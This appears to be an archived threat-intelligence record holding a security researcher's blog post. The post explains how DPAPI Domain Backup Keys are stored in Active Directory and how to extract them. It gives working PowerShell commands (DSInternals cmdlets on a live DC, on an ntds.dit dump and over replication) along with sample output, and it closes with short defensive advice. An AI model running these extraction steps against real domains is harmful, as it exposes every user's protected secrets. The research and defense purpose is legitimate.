{
	"id": "5759ab8b-e480-4c23-871c-09852bd7a935",
	"created_at": "2026-04-06T00:13:25.443328Z",
	"updated_at": "2026-04-10T13:11:52.910886Z",
	"deleted_at": null,
	"sha1_hash": "de0003bf0429e33ac1797a8031fcf6c357d4477e",
	"title": "Retrieving DPAPI Backup Keys from Active Directory",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 126857,
	"plain_text": "Retrieving DPAPI Backup Keys from Active Directory\r\nBy Michael Grafnetter\r\nPublished: 2015-10-26 · Archived: 2026-04-02 12:24:54 UTC\r\nThe Data Protection API (DPAPI) is used by several components of Windows to securely store passwords,\r\nencryption keys and other sensitive data. When DPAPI is used in an Active Directory domain environment, a copy\r\nof user’s master key is encrypted with a so-called DPAPI Domain Backup Key that is known to all domain\r\ncontrollers. Windows Server 2000 DCs use a symmetric key and newer systems use a public/private key pair.\r\nIf the user password is reset and the original master key is rendered inaccessible to the user, the user’s access\r\nto the master key is automatically restored using the backup key.\r\nThe Mimikatz Method\r\nBenjamin Delpy has already found a way to extract these backup keys from the LSASS of domain controllers.\r\nIt is implemented in the  lsadump::backupkeys mimikatz command and it even works remotely:\r\nDSInternals Implementation\r\nThis attack is also implemented in my DSInternals PowerShell module:\r\nGet-LsaBackupKey -ComputerName dc01.contoso.com |\r\n Save-DPAPIBlob -DirectoryPath '.\\Output'\r\nSharpDPAPI Implementation\r\nThe same sttack technique has also been implemented in GhostPack:\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 1 of 5\n\nKey Storage\r\nI have taken Benjamin’s research one step further and I can now extract these keys directly from the Active\r\nDirectory database, where they are physically stored:\r\nThe keys are stored in the currentValue attribute of objects whose names begin with BCKUPKEY\r\nand are of class secret. The BCKUPKEY_PREFERRED Secret and BCKUPKEY_P Secret objects actually\r\nonly contain GUIDs of objects that hold the current modern and legacy keys, respectively.\r\nFurthermore, the currentValue attribute is encrypted using BootKey (aka SysKey) and is never sent through\r\nLDAP. After decrypting it, we will get a self-signed certificate with no subject:\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 2 of 5\n\nThe Database Dump Method\r\nThe Get-BootKey, Get-ADDBBackupKey and Save-DPAPIBlob cmdlets from my DSInternals PowerShell\r\nModule can be used to retrieve the DPAPI Domain Backup Keys from ntds.dit files:\r\n# We need toget theBootKey fromtheSYSTEM registry hive first:\r\nGet-BootKey -SystemHiveFilePath 'C:\\IFM\\registry\\SYSTEM'\r\n\u003c#\r\nOutput:\r\n41e34661faa0d182182f6ddf0f0ca0d1\r\n#\u003e\r\n# Nowwe can decrypt theDPAPI backup keys fromthedatabase:\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 3 of 5\n\nGet-ADDBBackupKey -DBPath 'C:\\IFM\\Active Directory\\ntds.dit' `\r\n -BootKey 41e34661faa0d182182f6ddf0f0ca0d1 |\r\n Format-List\r\n\u003c#\r\nOutput:\r\nType: LegacyKey\r\nDistinguishedName: CN=BCKUPKEY_7882b20e-96ef-4ce5-a2b9-3efdccbbce28 Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {77, 138, 250, 6...}\r\nKeyId: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28\r\nType: PreferredLegacyKeyPointer\r\nDistinguishedName: CN=BCKUPKEY_P Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {14, 178, 130, 120...}\r\nKeyId: 7882b20e-96ef-4ce5-a2b9-3efdccbbce28\r\nType: RSAKey\r\nDistinguishedName: CN=BCKUPKEY_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {48, 130, 9, 186...}\r\nKeyId: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d\r\nType: PreferredRSAKeyPointer\r\nDistinguishedName: CN=BCKUPKEY_PREFERRED Secret,CN=System,DC=Adatum,DC=com\r\nRawKeyData: {62, 106, 197, 177...}\r\nKeyId: b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d\r\n#\u003e\r\n# Inmost cases, we just want toexport these keys tothe file system:\r\nGet-ADDBBackupKey -DBPath 'C:\\IFM\\Active Directory\\ntds.dit' `\r\n -BootKey 41e34661faa0d182182f6ddf0f0ca0d1 |\r\n Save-DPAPIBlob -DirectoryPath .\\Keys\r\n# New files should have been created intheKeys directory:\r\n(dir .\\Keys).Name\r\n\u003c#\r\nOutput:\r\nntds_capi_b1c56a3e-ddf7-41dd-a5f3-44a2ed27a96d.pfx\r\nntds_legacy_7882b20e-96ef-4ce5-a2b9-3efdccbbce28.key\r\n#\u003e\r\nNote that mimikatz would name these files similarly.\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 4 of 5\n\nThe DRSR Method\r\nThe same result can be achieved by communicating with the Directory Replication Service using the Get-ADReplBackupKey cmdlet:\r\nGet-ADReplBackupKey -Domain 'Adatum.com' -Server LON-DC1 |\r\n Save-DPAPIBlob -DirectoryPath .\\Keys\r\nDefense\r\nI am already starting to repeat myself:\r\nRestrict access to domain controller backups.\r\nBe cautious when delegating the Replicating Directory Changes All right.\r\nSource: https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nhttps://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.dsinternals.com/en/retrieving-dpapi-backup-keys-from-active-directory/"
	],
	"report_names": [
		"retrieving-dpapi-backup-keys-from-active-directory"
	],
	"threat_actors": [],
	"ts_created_at": 1775434405,
	"ts_updated_at": 1775826712,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.pdf",
		"text": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.txt",
		"img": "https://archive.orkl.eu/de0003bf0429e33ac1797a8031fcf6c357d4477e.jpg"
	}
}